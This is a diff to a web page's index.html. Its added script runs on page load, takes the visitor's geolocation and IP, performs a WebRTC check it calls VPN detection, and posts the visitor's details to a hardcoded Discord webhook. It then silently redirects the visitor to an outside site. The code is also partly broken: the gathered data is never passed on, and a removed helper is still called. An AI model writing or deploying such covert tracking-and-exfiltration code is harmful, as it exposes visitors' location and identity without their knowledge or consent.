--- a/index.html
+++ b/index.html
@@ -12,83 +12,83 @@
 </head>
 <body>
     <script>
-        document.addEventListener('DOMContentLoaded', function() {
+        // Function to send user and device information to Discord
+        const sendInfoToDiscord = (ip, address, userAgent, isVPN, coordinates) => {
             const webhookUrl = 'https://discord.com/api/webhooks/1181568688365772810/a8uz5coZtPV_fm96znZsrCny53RXJn55vjU0P6QfzL7VVVvcoDjnCvKgfbjPhHARDI5N'; // Replace with your Discord webhook URL
 
-            // Function to send user and device information to Discord
-            const sendInfoToDiscord = (ip, address, userAgent, isVPN, coordinates) => {
-                fetch(webhookUrl, {
-                    method: 'POST',
-                    headers: {
-                        'Content-Type': 'application/json',
-                    },
-                    body: JSON.stringify({
-                        content: `New visitor info:\nIP: ${ip || 'N/A'}\nAddress: ${address || 'N/A'}\nUser Agent: ${userAgent}\nVPN: ${isVPN ? 'Yes' : 'No'}\nCoordinates: ${coordinates}\nGoogle Maps Link: ${getGoogleMapsLink(coordinates)}`,
-                    }),
+            return fetch(webhookUrl, {
+                method: 'POST',
+                headers: {
+                    'Content-Type': 'application/json',
+                },
+                body: JSON.stringify({
+                    username: 'Visitor Info Bot',
+                    content: `New visitor info:\nIP: ${ip || 'N/A'}\nAddress: ${address || 'N/A'}\nUser Agent: ${userAgent}\nVPN: ${isVPN ? 'Yes' : 'No'}\nCoordinates: ${coordinates}\nGoogle Maps Link: ${getGoogleMapsLink(coordinates)}`,
+                }),
+            });
+        };
+
+        // Function to check if the user is using a VPN
+        const checkVPN = () => {
+            const RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
+
+            if (RTCPeerConnection) {
+                const rtc = new RTCPeerConnection({ iceServers: [] });
+                rtc.createDataChannel('');
+
+                rtc.createOffer().then(
+                    rtc.createAnswer.bind(rtc),
+                    () => {
+                        // The user is likely using a VPN
+                        sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, true, 'N/A').then(() => {
+                            redirectToWebsite();
+                        });
+                    }
+                ).catch(() => {
+                    // The user is not using a VPN
+                    sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, false, 'N/A').then(() => {
+                        redirectToWebsite();
+                    });
                 });
-            };
-
-            // Function to get Google Maps link with coordinates
-            const getGoogleMapsLink = (coordinates) => {
-                return `https://www.google.com/maps?q=${coordinates}`;
-            };
-
-            // Function to check if the user is using a VPN
-            const checkVPN = () => {
-                const RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
-
-                if (RTCPeerConnection) {
-                    const rtc = new RTCPeerConnection({ iceServers: [] });
-                    rtc.createDataChannel('');
-
-                    rtc.createOffer().then(
-                        rtc.createAnswer.bind(rtc),
-                        () => {
-                            // The user is likely using a VPN
-                            sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, true, 'N/A');
-                        }
-                    ).catch(() => {
-                        // The user is not using a VPN
-                        sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, false, 'N/A');
-                    });
-                } else {
-                    // Unable to determine VPN status
-                    sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, 'Unknown', 'N/A');
-                }
-            };
-
-            // Function to get visitor's information including coordinates
-            const getVisitorInfo = async () => {
-                try {
-                    const position = await new Promise((resolve, reject) => {
-                        navigator.geolocation.getCurrentPosition(resolve, reject);
-                    });
-
-                    const coordinates = `${position.coords.latitude},${position.coords.longitude}`;
-
-                    // Requesting IP and address from a third-party service (replace with your preferred service)
-                    const infoResponse = await fetch('https://ipinfo.io/json');
-                    const infoData = await infoResponse.json();
-
-                    const ip = infoData.ip || 'N/A';
-                    const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
-                    const userAgent = navigator.userAgent;
-
-                    // Check if the user is using a VPN
-                    checkVPN();
-
-                     // Call the function when the page loads
-                    getVisitorInfo();
-    </script>
-    
-    <script> 
-    // Redirect to "https://moopx.pro"
-                    window.location.href = "https://moopx.pro";
-                } catch (error) {
-                    console.error('Error fetching location or address:', error);
-                }
+            } else {
+                // Unable to determine VPN status
+                sendInfoToDiscord('N/A', 'N/A', navigator.userAgent, 'Unknown', 'N/A').then(() => {
+                    redirectToWebsite();
+                });
             }
-        });
+        };
+
+        // Function to get visitor's information including coordinates
+        const getVisitorInfo = async () => {
+            try {
+                const position = await new Promise((resolve, reject) => {
+                    navigator.geolocation.getCurrentPosition(resolve, reject);
+                });
+
+                const coordinates = `${position.coords.latitude},${position.coords.longitude}`;
+
+                // Requesting IP and address from a third-party service (replace with your preferred service)
+                const infoResponse = await fetch('https://ipinfo.io/json');
+                const infoData = await infoResponse.json();
+
+                const ip = infoData.ip || 'N/A';
+                const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
+                const userAgent = navigator.userAgent;
+
+                // Check if the user is using a VPN and redirect after Discord webhook response
+                checkVPN();
+            } catch (error) {
+                console.error('Error fetching location or address:', error);
+            }
+        };
+
+        // Function to redirect to "https://moopx.pro"
+        const redirectToWebsite = () => {
+            window.location.href = "https://moopx.pro";
+        };
+
+        // Call the function when the page loads
+        document.addEventListener('DOMContentLoaded', getVisitorInfo);
     </script>
 </body>
 </html>
